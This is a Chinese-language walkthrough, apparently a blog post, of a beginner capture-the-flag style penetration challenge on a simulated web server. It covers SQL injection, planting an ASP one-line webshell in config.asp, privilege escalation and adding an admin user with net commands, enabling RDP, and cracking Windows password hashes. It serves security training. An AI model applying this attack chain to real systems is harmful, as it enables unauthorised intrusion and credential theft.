- 挑戰鏈接: http://www.ichunqiu.com/tiaozhan/114
- 知識點: 后台目錄掃描,SQL Injection,一句話木馬, 提權,登陸密碼破解
這個挑戰是為像我這種從來都沒有完整的做過一次滲透的菜鳥准備的,所以線索基本都擺在明面上,只要清楚流程,一步一步來,最終都能完成的。話是這么說,自己做的過程中還是有很多地方卡住了……加了個油。
首先根據要求使用的工具和要回答的問題來看,流程應該是這個樣子的,“御劍”掃后台→“Pangolin”SQL注入獲取管理員密碼,登陸后台→上傳一句話木馬→“中國菜刀”連接獲取webshell→“Pr”提權,添加服務器用戶→“3389.exe”開啟3389端口→遠程桌面連接服務器,獲取Administrators用戶的登錄密碼。
用“御劍”對網站后台目錄進行掃描,可得網站后台地址:http://www.test.ichunqiu/admin/index.asp ,打開后可以看到標題是“魅力企業網站管理系統”,嗯……看起來像是個CMS,趕緊谷歌一下子,發現后台默認用戶名及密碼為admin,admin888,輸進去試一試,我*直接進去了……不過本着“負責任”(負哪門子責任……)的態度,看看有沒有SQL注入吧,好家伙,產品頁,新聞頁,凡是帶“ID=”的都有……手工試了一下order by語句,試出了有26列,然后用union select語句,結果就出來了,如下圖,username為admin,password的結果應該是經過md5加密了,解密得到admin888。
當然,我們也可以用指定的工具“Pangolin”進行SQL注入,操作很簡單,很快就爆出了用戶名和密碼,如下圖
成功登錄到后台后,就應該找寫一句話木馬的地方了。發現有備份數據庫的功能,嘗試備份,提示備份成功后去恢復備份功能下看,結果根本沒有備份文件……難道這備份功能就是個擺設???好吧,那就找找有沒有能夠上傳文件的地方,通過“御劍”掃出的地址中有包含“Upload”字符的,應該能夠上傳文件,在瀏覽器中打開后卻發現,只能選擇文件然而沒有上傳的按鈕……好吧,再看看,有個“系統設置”功能,而且剛剛谷歌后也可以下載到該CMS的所有安裝文件,可以找到“系統設置”的文件路徑為Web目錄下的inc/config.asp,嘗試修改“系統設置”來插入一句話木馬,然而多次把網站搞得打不開了……幸虧是模擬環境,重啟一下就好了……應該是語句沒有閉合好的問題,仔細觀察config.asp文件,重新設置一下語句,最后成功插入,網站也能正常訪問。插入的語句為"eval request("1")',如下圖
接下來用“中國菜刀”連接,如下圖
菜刀連接成功后,找到有寫權限的目錄,比如C:\RECYCLER\,上傳文件“cmd.exe”,“pr.exe”,“3389.exe”,如下圖所示。在“cmd.exe”上右鍵,打開虛擬終端
使用“Pr”工具提權,執行命令添加用戶,如下圖所示
給添加的用戶賦予管理員權限,如下圖所示
給添加的用戶賦予遠程登錄權限,因為遠程登錄用戶組的名稱為Remote Desktop Users,中間有空格,直接用“Pr”執行會出錯,因此可以先把要執行的語句net localgroup "Remote Desktop Users" test /add寫到批處理文件中,直接執行批處理命令,如下圖所示
開啟3389端口,如下圖所示
運行mstsc打開遠程桌面,使用test,test作為用戶名和密碼登錄到服務器,用菜刀把口令破解工具cain上傳到服務器,在服務器上安裝好並打開,切換到“Cracker”標簽下,點擊“LM & NTLM Hashers”,點擊右邊表格區域,在點擊上面藍色的加號,在出現的窗口中選中“Include Password History Hashes”,點擊“NEXT”
這樣便可獲得系統中所有的用戶名及其登錄密碼的HASH
現在針對Administrators用戶的登錄密碼HASH進行暴力破解,發現花費時間太長了,最后找到一個在線破解的網站https://www.objectif-securite.ch/en/ophcrack.php ,一下就解出來了,cu9e2cgw